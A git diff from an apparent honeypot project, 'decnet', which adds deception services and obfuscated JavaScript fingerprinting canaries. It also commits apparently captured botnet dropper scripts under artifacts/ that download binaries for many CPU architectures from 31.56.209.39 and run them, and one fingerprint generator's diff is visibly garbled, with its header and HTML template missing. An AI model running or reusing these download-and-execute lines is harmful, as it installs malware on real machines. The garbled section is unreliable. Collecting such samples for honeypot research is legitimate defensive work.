diff --git a/.gitignore b/.gitignore index bc75c3dd..67d247c5 100644 --- a/.gitignore +++ b/.gitignore @@ -51,3 +51,9 @@ schem # pydeps-style dependency graph dumps from local analysis runs. deps.txt + +# Node modules vendored under decnet/canary/ for the obfuscator helper. +# The package.json is the source of truth; modules are reinstalled at +# build/deploy time. +node_modules/ +package-lock.json diff --git a/README.md b/README.md index 21c17ac0..bce15306 100644 --- a/README.md +++ b/README.md @@ -182,6 +182,7 @@ Archetypes are pre-packaged machine identities. One slug sets services, preferre | Slug | Services | OS Fingerprint | Description | |---|---|---|---| +| `deaddeck` | ssh | linux | Initial machine to be exploited. Real SSH container. | | `windows-workstation` | smb, rdp | windows | Corporate Windows desktop | | `windows-server` | smb, rdp, ldap | windows | Windows domain member | | `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC | @@ -272,6 +273,11 @@ List live at any time with `decnet services`. Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code. ```ini +[deaddeck-1] +amount=1 +archetype=deaddeck +ssh.password=admin + [decky-webmail.http] server_header = Apache/2.4.54 (Debian) fake_app = wordpress diff --git a/artifacts/curl.sh b/artifacts/curl.sh new file mode 100644 index 00000000..805e4049 --- /dev/null +++ b/artifacts/curl.sh @@ -0,0 +1,3 @@ +[0] Downloading 'http://31.56.209.39/curl.sh' ... +Saving 'curl.sh.1' +HTTP response 200 OK [http://31.56.209.39/curl.sh] diff --git a/artifacts/curl.sh.1 b/artifacts/curl.sh.1 new file mode 100644 index 00000000..a6da0876 --- /dev/null +++ b/artifacts/curl.sh.1 @@ -0,0 +1,46 @@ +#!/bin/sh +ulimit -n 4096 +ulimit -n 999999 +ulimit -v 2097152 +cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x +rm -rf odin* +rm -rf bizy* +rm -rf rs* +rm -rf *.sh + +#curl http://31.56.209.39/rs.arm -o rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm +#curl http://31.56.209.39/rs.arm5 -o rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5 +#curl http://31.56.209.39/rs.arm6 -o rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6 +#curl http://31.56.209.39/rs.arm7 -o rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7 +#curl http://31.56.209.39/rs.mips -o rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips +#curl http://31.56.209.39/rs.mipsle -o rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle +#curl http://31.56.209.39/rs.mipsSF -o rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF +#curl http://31.56.209.39/rs.mipsleSF -o rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF +#curl http://31.56.209.39/rs.x86 -o rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86 +#curl http://31.56.209.39/rs.x64 -o rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64 + +curl http://31.56.209.39/odin.arm -o odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.curl +curl http://31.56.209.39/odin.arm5 -o odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.curl +curl http://31.56.209.39/odin.arm5n -o odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.curl +curl http://31.56.209.39/odin.arm6 -o odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.curl +curl http://31.56.209.39/odin.arm7 -o odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.curl +curl http://31.56.209.39/odin.m68k -o odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.curl +curl http://31.56.209.39/odin.mips -o odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.curl +curl http://31.56.209.39/odin.mpsl -o odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.curl +curl http://31.56.209.39/odin.ppc -o odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.curl +curl http://31.56.209.39/odin.sh4 -o odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.curl +curl http://31.56.209.39/odin.spc -o odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.curl +curl http://31.56.209.39/odin.x64 -o odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.curl +curl http://31.56.209.39/odin.x86 -o odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.curl + +curl http://31.56.209.39/bizy.arm5 -o bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5 +curl http://31.56.209.39/bizy.arm6 -o bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6 +curl http://31.56.209.39/bizy.arm7 -o bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7 +curl http://31.56.209.39/bizy.arm8 -o bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8 +curl http://31.56.209.39/bizy.mips -o bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips +curl http://31.56.209.39/bizy.mpsl -o bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl +curl http://31.56.209.39/bizy.mipss -o bizy.mipss; chmod +x bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss; +curl http://31.56.209.39/bizy.mpsls -o bizy.mpsls; chmod +x bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls; +curl http://31.56.209.39/bizy.riscv -o bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv +curl http://31.56.209.39/bizy.x86 -o bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86 +curl http://31.56.209.39/bizy.x64 -o bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64 diff --git a/artifacts/evil.sh b/artifacts/evil.sh new file mode 100644 index 00000000..30cbec18 --- /dev/null +++ b/artifacts/evil.sh @@ -0,0 +1,3 @@ + wget http://31.56.209.39/wget.sh -o wget.sh + + wget http://31.56.209.39/curl.sh -o curl.sh diff --git a/artifacts/wget.sh b/artifacts/wget.sh new file mode 100644 index 00000000..3a4099e1 --- /dev/null +++ b/artifacts/wget.sh @@ -0,0 +1,3 @@ +[0] Downloading 'http://31.56.209.39/wget.sh' ... +Saving 'wget.sh.1' +HTTP response 200 OK [http://31.56.209.39/wget.sh] diff --git a/artifacts/wget.sh.1 b/artifacts/wget.sh.1 new file mode 100644 index 00000000..366613d9 --- /dev/null +++ b/artifacts/wget.sh.1 @@ -0,0 +1,46 @@ +#!/bin/sh +ulimit -n 4096 +ulimit -n 999999 +ulimit -v 2097152 +cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x +rm -rf odin* +rm -rf bizy* +rm -rf rs* +rm -rf *.sh + +wget http://31.56.209.39/rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm +wget http://31.56.209.39/rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5 +wget http://31.56.209.39/rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6 +wget http://31.56.209.39/rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7 +wget http://31.56.209.39/rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips +wget http://31.56.209.39/rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle +wget http://31.56.209.39/rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF +wget http://31.56.209.39/rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF +wget http://31.56.209.39/rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86 +wget http://31.56.209.39/rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64 + +wget http://31.56.209.39/odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.wget +wget http://31.56.209.39/odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.wget +wget http://31.56.209.39/odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.wget +wget http://31.56.209.39/odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.wget +wget http://31.56.209.39/odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.wget +wget http://31.56.209.39/odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.wget +wget http://31.56.209.39/odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.wget +wget http://31.56.209.39/odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.wget +wget http://31.56.209.39/odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.wget +wget http://31.56.209.39/odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.wget +wget http://31.56.209.39/odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.wget +wget http://31.56.209.39/odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.wget +wget http://31.56.209.39/odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.wget + +wget http://31.56.209.39/bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5 +wget http://31.56.209.39/bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6 +wget http://31.56.209.39/bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7 +wget http://31.56.209.39/bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8 +wget http://31.56.209.39/bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips +wget http://31.56.209.39/bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl +wget http://31.56.209.39/bizy.mipss; chmod +x ./bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss +wget http://31.56.209.39/bizy.mpsls; chmod +x ./bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls +wget http://31.56.209.39/bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv +wget http://31.56.209.39/bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86 +wget http://31.56.209.39/bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64 diff --git a/decnet.tar b/decnet.tar new file mode 100644 index 00000000..02de619a Binary files /dev/null and b/decnet.tar differ diff --git a/decnet/agent/topology_ops.py b/decnet/agent/topology_ops.py index f8f156f2..7a03233d 100644 --- a/decnet/agent/topology_ops.py +++ b/decnet/agent/topology_ops.py @@ -59,6 +59,73 @@ def _topology_id(hydrated: dict[str, Any]) -> str: return str(tid) +def _check_hash_and_validate(hydrated: dict[str, Any], version_hash: str) -> str: + """Verify hash integrity and structural validity; return topology_id.""" + local_hash = canonical_hash(hydrated) + if local_hash != version_hash: + raise HashMismatch( + f"master hash {version_hash!r} does not match agent hash " + f"{local_hash!r} — refusing to apply" + ) + issues = _validate_topology(hydrated) + if _validation_errors(issues): + raise ValidationError(issues) + return _topology_id(hydrated) + + +async def _teardown_superseded(topology_id: str, store: TopologyStore) -> None: + """Tear down the current topology if it differs from topology_id. + + Master is authoritative — a different pinned topology (fully applied, + partially applied, or drifted) is torn down before the new apply proceeds. + Refusing with 409 would leave the agent stuck in a state only a human + could resolve. + """ + existing = store.current() + if existing is None or existing.topology_id == topology_id: + return + log.info( + "superseding topology %s with %s on master authority", + existing.topology_id, topology_id, + ) + try: + await teardown(existing.topology_id, store) + except Exception as exc: # noqa: BLE001 — we still want to try applying + log.warning( + "best-effort teardown of superseded topology %s failed: %s", + existing.topology_id, exc, + ) + # Hard-clear the store row so the new apply isn't blocked by a + # half-torn-down predecessor. Leftover docker objects surface via + # the next heartbeat's observed block. + store.clear(existing.topology_id) + + +def _materialise(hydrated: dict[str, Any], topology_id: str) -> None: + """Create bridge networks, write compose file, and bring up containers. + + Sync/blocking — callers must dispatch via asyncio.to_thread. + + ``--always-recreate-deps`` keeps service containers' netns shares + fresh: every decky service joins its base's netns via + ``network_mode: container:``, and that share is bound at + service start time. If a base is recreated (e.g. when ``ports:`` + changes after toggling ``forwards_l3``) but compose decides the + services are unchanged, the services keep a stale netns FD + pointing at the destroyed base — they end up in an empty + namespace with only ``lo``, and external traffic hits a closed + port on the live base. Forcing dependents to recreate alongside + the base is the cheapest way to make this race impossible. + """ + compose_path = _topology_compose_path(topology_id) + client = docker.from_env() + for lan in hydrated["lans"]: + net_name = _topology_network_name(topology_id, lan["name"]) + create_bridge_network(client, net_name, lan["subnet"], internal=not lan["is_dmz"]) + write_topology_compose(hydrated, compose_path) + _compose_with_retry("up", "--build", "-d", "--always-recreate-deps", compose_file=compose_path) + + async def apply( hydrated: dict[str, Any], version_hash: str, @@ -73,76 +140,11 @@ async def apply( Any docker / compose error propagates up; the endpoint maps it to 500 and records the message on the store row. """ - local_hash = canonical_hash(hydrated) - if local_hash != version_hash: - raise HashMismatch( - f"master hash {version_hash!r} does not match agent hash " - f"{local_hash!r} — refusing to apply" - ) - - issues = _validate_topology(hydrated) - if _validation_errors(issues): - raise ValidationError(issues) - - topology_id = _topology_id(hydrated) - # Master is authoritative. If a different topology is pinned here - # — whether it fully applied, only partially applied (failure - # marker row + orphan containers), or drifted — teardown first, - # then accept the new one. Refusing with 409 would leave the - # agent stuck in a state only a human could resolve. - existing = store.current() - if existing is not None and existing.topology_id != topology_id: - log.info( - "superseding topology %s with %s on master authority", - existing.topology_id, topology_id, - ) - try: - await teardown(existing.topology_id, store) - except Exception as exc: # noqa: BLE001 — we still want to try applying - log.warning( - "best-effort teardown of superseded topology %s failed: %s", - existing.topology_id, exc, - ) - # Hard-clear the store row so the new apply isn't blocked - # by a half-torn-down predecessor. Leftover docker objects - # will surface via the next heartbeat's observed block. - store.clear(existing.topology_id) - - lans = hydrated["lans"] - compose_path = _topology_compose_path(topology_id) - client = docker.from_env() - - # Bridges + compose are sync/blocking; hop to a thread so we don't - # stall the event loop on a slow docker daemon. - def _materialise() -> None: - for lan in lans: - net_name = _topology_network_name(topology_id, lan["name"]) - internal = not lan["is_dmz"] - create_bridge_network( - client, net_name, lan["subnet"], internal=internal - ) - write_topology_compose(hydrated, compose_path) - # ``--always-recreate-deps`` keeps service containers' netns shares - # fresh: every decky service joins its base's netns via - # ``network_mode: container:``, and that share is bound at - # service start time. If a base is recreated (e.g. when ``ports:`` - # changes after toggling ``forwards_l3``) but compose decides the - # services are unchanged, the services keep a stale netns FD - # pointing at the destroyed base — they end up in an empty - # namespace with only ``lo``, and external traffic hits a closed - # port on the live base. Forcing dependents to recreate alongside - # the base is the cheapest way to make this race impossible. - _compose_with_retry( - "up", "--build", "-d", "--always-recreate-deps", - compose_file=compose_path, - ) - - await asyncio.to_thread(_materialise) - + topology_id = _check_hash_and_validate(hydrated, version_hash) + await _teardown_superseded(topology_id, store) + await asyncio.to_thread(_materialise, hydrated, topology_id) store.put(topology_id, version_hash, hydrated) - log.info( - "topology %s applied on agent (%d LANs)", topology_id, len(lans) - ) + log.info("topology %s applied on agent (%d LANs)", topology_id, len(hydrated["lans"])) async def teardown( diff --git a/decnet/agent/topology_store.py b/decnet/agent/topology_store.py index 7112307e..86427597 100644 --- a/decnet/agent/topology_store.py +++ b/decnet/agent/topology_store.py @@ -63,6 +63,7 @@ class TopologyStore: # The agent is single-process, so there's no real contention — # sqlite's own connection lock is enough. self._conn = sqlite3.connect(str(db_path), check_same_thread=False) + self._conn.row_factory = sqlite3.Row self._conn.execute( "CREATE TABLE IF NOT EXISTS applied_topology (" " topology_id TEXT PRIMARY KEY," @@ -84,11 +85,11 @@ class TopologyStore: if row is None: return None return AppliedRow( - topology_id=row[0], - applied_version_hash=row[1], - hydrated=json.loads(row[2]), - applied_at=int(row[3]), - last_error=row[4], + topology_id=row["topology_id"], + applied_version_hash=row["applied_version_hash"], + hydrated=json.loads(row["hydrated_blob_json"]), + applied_at=int(row["applied_at"]), + last_error=row["last_error"], ) # ---------------------------------------------------------------- writes diff --git a/decnet/asn/iptoasn/provider.py b/decnet/asn/iptoasn/provider.py index fbd243b5..024c83a3 100644 --- a/decnet/asn/iptoasn/provider.py +++ b/decnet/asn/iptoasn/provider.py @@ -13,7 +13,7 @@ from typing import Sequence from decnet.asn.base import Provider from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all from decnet.asn.iptoasn.parse import parse_file -from decnet.asn.lookup import AsnLookup +from decnet.asn.lookup import AsnLookup, Range from decnet.asn.paths import ensure_root logger = logging.getLogger("decnet.asn.iptoasn.provider") @@ -54,7 +54,7 @@ class IptoasnProvider(Provider): "asn.iptoasn: cache load failed, rebuilding: %s", exc ) - ranges = [] + ranges: list[Range] = [] for path in self.data_paths(): if not path.exists(): continue diff --git a/decnet/bus/topics.py b/decnet/bus/topics.py index 3c89d7e4..528933e2 100644 --- a/decnet/bus/topics.py +++ b/decnet/bus/topics.py @@ -54,6 +54,7 @@ SYSTEM = "system" CREDENTIAL = "credential" ORCHESTRATOR = "orchestrator" CANARY = "canary" +SMTP = "smtp" # ─── Leaf event-type constants (the last segment of each topic) ────────────── @@ -83,6 +84,19 @@ DECKY_MUTATE_REQUEST = "mutate_request" # syslog sidechannel too) to interleave substrate-change markers into # attacker traversals. DECKY_MUTATION = "mutation" +# Per-service add/remove on a deployed decky (live; no full redeploy). +# Payload carries ``decky_name``, ``service_name``, optional +# ``topology_id``, and ``services`` (the post-mutation list). Consumers +# that watch substrate shape (correlator, dashboard, profiler) reconcile +# off these without waiting for the next decnet-state.json snapshot. +DECKY_SERVICE_ADDED = "service_added" +DECKY_SERVICE_REMOVED = "service_removed" +# Per-service config change (the schema-driven Inspector form). Payload +# carries ``decky_name``, ``service_name``, optional ``topology_id``, +# ``service_config`` (the new validated dict), and ``recreated`` — true +# when the operator hit Apply (container was force-recreated to pick up +# the new env), false when they only hit Save (DB-only). +DECKY_SERVICE_CONFIG_CHANGED = "service_config_changed" # Attacker event types (second token under the ``attacker`` root). First # sighting, session boundary transitions, and score-threshold crossings @@ -381,6 +395,16 @@ def system_control(worker: str) -> str: return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}" +def smtp(event_type: str) -> str: + """Build ``smtp.``. + + *event_type* may contain dots (e.g. ``probe.pending``). + """ + if not event_type: + raise ValueError("smtp topic requires a non-empty event_type") + return f"{SMTP}.{event_type}" + + def _reject_tokens(*parts: str) -> None: """Reject topic segments that would break NATS-style tokenization. diff --git a/decnet/canary/_obfuscate_helper.js b/decnet/canary/_obfuscate_helper.js new file mode 100644 index 00000000..a1dbc067 --- /dev/null +++ b/decnet/canary/_obfuscate_helper.js @@ -0,0 +1,18 @@ +// Node helper invoked by decnet.canary.obfuscator. +// Reads {code, options} JSON from stdin, writes obfuscated JS to stdout. +// Kept dependency-light on purpose: only javascript-obfuscator. +const JsObf = require('javascript-obfuscator'); + +let raw = ''; +process.stdin.setEncoding('utf8'); +process.stdin.on('data', (chunk) => { raw += chunk; }); +process.stdin.on('end', () => { + try { + const { code, options } = JSON.parse(raw); + const result = JsObf.obfuscate(code, options || {}); + process.stdout.write(result.getObfuscatedCode()); + } catch (e) { + process.stderr.write(String(e && e.stack || e)); + process.exit(2); + } +}); diff --git a/decnet/canary/base.py b/decnet/canary/base.py index 160dcd19..d9e05552 100644 --- a/decnet/canary/base.py +++ b/decnet/canary/base.py @@ -100,6 +100,12 @@ class CanaryArtifact: planting. Never leaked to the attacker-facing surface. """ + fingerprint_nonce: Optional[str] = None + """Per-mint HMAC nonce for fingerprint canaries; ``None`` for everything + else. Cultivator reads this and persists it on ``CanaryToken.fingerprint_nonce`` + so the worker can validate incoming ``?k=`` params. + """ + class CanaryGenerator(ABC): """Produces a fake artifact from scratch.""" diff --git a/decnet/canary/cultivator.py b/decnet/canary/cultivator.py index dbeb3b6d..a71d2290 100644 --- a/decnet/canary/cultivator.py +++ b/decnet/canary/cultivator.py @@ -46,6 +46,8 @@ _CLASS_TO_GENERATOR: dict[ContentClass, str] = { ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx", ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf", ContentClass.CANARY_MYSQL_DUMP: "mysql_dump", + ContentClass.CANARY_FINGERPRINT_HTML: "fingerprint_html", + ContentClass.CANARY_FINGERPRINT_SVG: "fingerprint_svg", } @@ -62,6 +64,8 @@ _GENERATOR_TO_KIND: dict[str, str] = { "honeydoc_pdf": "http", "ssh_key": "dns", # trip is DNS resolution of host comment "mysql_dump": "dns", # trip is DNS resolution of subdomain + "fingerprint_html": "http", # obfuscated JS beacons GET /c/ + "fingerprint_svg": "http", # same, embedded inside SVG + + +""" + + +_ROW_POOL = ( + ("ny-app-01.corp.local", "k.tanaka", "app server", "vlan20", "primary"), + ("ny-db-01.corp.local", "ops", "postgres primary", "vlan30", "backup nightly"), + ("ny-build-02.corp.local", "ci-bot", "jenkins agent", "vlan40", ""), + ("sf-vpn-01.corp.local", "netsec", "wireguard endpoint", "vlan10", "external"), + ("ldn-mail-03.corp.local", "j.weber", "exchange edge", "vlan50", ""), + ("hk-cache-01.corp.local", "ops", "redis replica", "vlan30", "lag <1s"), + ("br-dev-04.corp.local", "m.silva", "dev sandbox", "vlan60", "ephemeral"), + ("eu-bastion-02.corp.local", "secops", "ssh jump host", "vlan10", "mfa required"), + ("us-archive-01.corp.local", "compliance", "log archive", "vlan70", "retain 7y"), +) + + +def _build_rows(callback_token: str) -> tuple[str, int]: + pick = _stable_int(callback_token, "pick") % len(_ROW_POOL) + take = 5 + (_stable_int(callback_token, "take") % 4) + selected = [_ROW_POOL[(pick + i) % len(_ROW_POOL)] for i in range(take)] + cells = "\n".join( + "" + "".join(f"{c}" for c in row) + "" + for row in selected + ) + return cells, len(selected) + + +def _sync_label(callback_token: str) -> str: + day = _stable_int(callback_token, "day") % 28 + 1 + hour = _stable_int(callback_token, "hour") % 24 + return f"2026-04-{day:02d} {hour:02d}:14 UTC" + + +class FingerprintHtmlGenerator(CanaryGenerator): + """Synthesise an HTML page that fingerprints the browser opening it.""" + + name = "fingerprint_html" + + def generate(self, ctx: CanaryContext) -> CanaryArtifact: + mint_uuid = _mint_uuid_for(ctx.callback_token) + nonce = nonce_for(ctx.callback_token, mint_uuid) + payload = render_fingerprint_js( + callback_token=ctx.callback_token, + http_base=ctx.http_base, + mint_uuid=mint_uuid, + nonce=nonce, + ) + rows, row_count = _build_rows(ctx.callback_token) + body = _PAGE_TEMPLATE.format( + sync_label=_sync_label(ctx.callback_token), + row_count=row_count, + rows=rows, + payload=payload, + ) + beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}" + return CanaryArtifact( + path="", + content=body.encode("utf-8"), + mode=0o644, + mtime_offset=-86400 * 14, + generator=self.name, + fingerprint_nonce=nonce, + notes=[ + f"obfuscated fingerprinter beacons={beacon}", + f"mint_uuid={mint_uuid}", + ], + ) diff --git a/decnet/canary/generators/fingerprint_svg.py b/decnet/canary/generators/fingerprint_svg.py new file mode 100644 index 00000000..78fda748 --- /dev/null +++ b/decnet/canary/generators/fingerprint_svg.py @@ -0,0 +1,88 @@ +"""SVG fingerprint canary — standalone SVG with an embedded `` + +""" + + +_REGIONS = ("us-east", "eu-central", "ap-south", "us-west", "sa-east") + + +class FingerprintSvgGenerator(CanaryGenerator): + """Synthesise an SVG that fingerprints the browser opening it.""" + + name = "fingerprint_svg" + + def generate(self, ctx: CanaryContext) -> CanaryArtifact: + mint_uuid = _mint_uuid_for(ctx.callback_token) + nonce = nonce_for(ctx.callback_token, mint_uuid) + payload = render_fingerprint_js( + callback_token=ctx.callback_token, + http_base=ctx.http_base, + mint_uuid=mint_uuid, + nonce=nonce, + ) + region = _REGIONS[_stable_int(ctx.callback_token, "reg") % len(_REGIONS)] + ver = 1 + (_stable_int(ctx.callback_token, "ver") % 6) + day = _stable_int(ctx.callback_token, "day") % 28 + 1 + body = _DIAGRAM_TEMPLATE.format( + region=region, + ver=ver, + review=f"2026-03-{day:02d}", + payload=payload, + ) + beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}" + return CanaryArtifact( + path="", + content=body.encode("utf-8"), + mode=0o644, + mtime_offset=-86400 * 30, + generator=self.name, + fingerprint_nonce=nonce, + notes=[ + f"obfuscated fingerprinter beacons={beacon}", + f"mint_uuid={mint_uuid}", + ], + ) diff --git a/decnet/canary/obfuscator.py b/decnet/canary/obfuscator.py new file mode 100644 index 00000000..81b93e3e --- /dev/null +++ b/decnet/canary/obfuscator.py @@ -0,0 +1,177 @@ +"""Per-mint JS obfuscator wrapper. + +Thin Python wrapper around the ``javascript-obfuscator`` Node package. +Used by the fingerprint generators / instrumenters to produce a unique, +hard-to-statically-analyse JS blob per canary mint. + +Two design choices flow from the canary contract in :mod:`base`: + +* **Determinism.** Generators must return byte-identical artifacts for + the same ``(callback_token, http_base, dns_zone, persona)``. We + derive a numeric seed from the callback token and pass it to the + obfuscator's own ``seed`` option, and we derive the polymorphic + config bits from the same hash so a re-mint reproduces exactly. +* **Per-mint uniqueness.** Two different callback tokens produce + structurally different output: different identifier names, different + string-array rotation, optionally different transforms enabled. + +The Node helper at ``_obfuscate_helper.js`` is invoked via subprocess. +We pass code+options as JSON on stdin and read the obfuscated result +from stdout. Stderr surfaces obfuscator failures. +""" +from __future__ import annotations + +import hashlib +import hmac +import json +import os +import subprocess # nosec B404 — Node helper exec is the whole point +from pathlib import Path +from typing import Any + +_HELPER = Path(__file__).parent / "_obfuscate_helper.js" +_PAYLOAD = Path(__file__).parent / "fingerprint_payload.js" + +# Node binary path. Honor DECNET_NODE_BIN so deployments can pin a +# specific runtime; default to PATH lookup. +_NODE_BIN = os.environ.get("DECNET_NODE_BIN", "node") + +# Hard timeout for the obfuscator subprocess. Real runs on the +# fingerprint payload sit well under 5s on a dev box. +_TIMEOUT_S = 30 + + +class ObfuscatorError(RuntimeError): + """Raised when the Node helper fails or returns empty output.""" + + +class FingerprintSecretMissing(RuntimeError): + """Raised when ``DECNET_CANARY_FINGERPRINT_SECRET`` is unset. + + Fingerprint canaries embed a per-mint nonce derived from this + server-side secret; without it the worker cannot validate incoming + fingerprint beacons, so we fail loud at mint time rather than ship + a defeatable canary. + """ + + +_FINGERPRINT_SECRET_ENV = "DECNET_CANARY_FINGERPRINT_SECRET" # nosec B105 — this is an env var name, not a hardcoded password + + +def nonce_for(callback_token: str, mint_uuid: str) -> str: + """Compute the per-mint fingerprint nonce. + + HMAC-SHA256 keyed on the server-side master secret, message is + ``callback_token + "|" + mint_uuid``. Truncated to 16 hex chars + (~64 bits of entropy) — enough to defeat slug-only forgery while + fitting comfortably into a query string. + """ + secret = os.environ.get(_FINGERPRINT_SECRET_ENV, "") + if not secret: + raise FingerprintSecretMissing( + f"{_FINGERPRINT_SECRET_ENV} is unset; fingerprint canaries cannot mint" + ) + msg = f"{callback_token}|{mint_uuid}".encode("utf-8") + return hmac.new(secret.encode("utf-8"), msg, hashlib.sha256).hexdigest()[:16] + + +def _seed_from_token(callback_token: str) -> int: + """Derive a 31-bit numeric seed from the callback token. + + ``javascript-obfuscator`` expects ``seed: number`` (int32-ish); + using a SHA-256-derived prefix gives us a uniform distribution + across the 31-bit positive range. + """ + h = hashlib.sha256(callback_token.encode("utf-8")).digest() + return int.from_bytes(h[:4], "big") & 0x7FFFFFFF + + +def _config_from_seed(seed: int) -> dict[str, Any]: + """Build a deterministic, per-mint obfuscator config. + + The hash bits drive *which* transforms apply — two mints get + structurally different outputs, not just different identifier names. + Defaults stay aggressive enough that reverse engineering is real + work; we never disable string-array or rename, only vary the dial. + """ + bits = seed + encodings = ("base64", "rc4") + string_array_encoding = [encodings[bits & 1]] + control_flow_threshold = 0.5 + ((bits >> 1) & 0xFF) / 512.0 # 0.5 .. ~1.0 + dead_code_threshold = 0.2 + ((bits >> 9) & 0xFF) / 512.0 # 0.2 .. ~0.7 + transform_object_keys = bool((bits >> 17) & 1) + numbers_to_expressions = bool((bits >> 18) & 1) + simplify = bool((bits >> 19) & 1) + return { + "compact": True, + "seed": seed, + "controlFlowFlattening": True, + "controlFlowFlatteningThreshold": round(control_flow_threshold, 3), + "deadCodeInjection": True, + "deadCodeInjectionThreshold": round(dead_code_threshold, 3), + "stringArray": True, + "stringArrayEncoding": string_array_encoding, + "stringArrayThreshold": 1, + "stringArrayRotate": True, + "stringArrayShuffle": True, + "splitStrings": True, + "splitStringsChunkLength": 4 + (bits & 7), + "transformObjectKeys": transform_object_keys, + "numbersToExpressions": numbers_to_expressions, + "simplify": simplify, + "selfDefending": False, # breaks SVG embed; not worth the cost + "renameGlobals": False, + "identifierNamesGenerator": "mangled-shuffled", + } + + +def obfuscate(code: str, *, callback_token: str) -> str: + """Obfuscate *code* deterministically per *callback_token*. + + Raises :class:`ObfuscatorError` if Node fails or returns empty. + """ + seed = _seed_from_token(callback_token) + options = _config_from_seed(seed) + payload = json.dumps({"code": code, "options": options}) + try: + proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed helper path; payload is JSON on stdin, not in argv + [_NODE_BIN, str(_HELPER)], + input=payload, capture_output=True, text=True, + timeout=_TIMEOUT_S, check=False, + ) + except FileNotFoundError as e: + raise ObfuscatorError(f"node binary not found: {_NODE_BIN!r}") from e + except 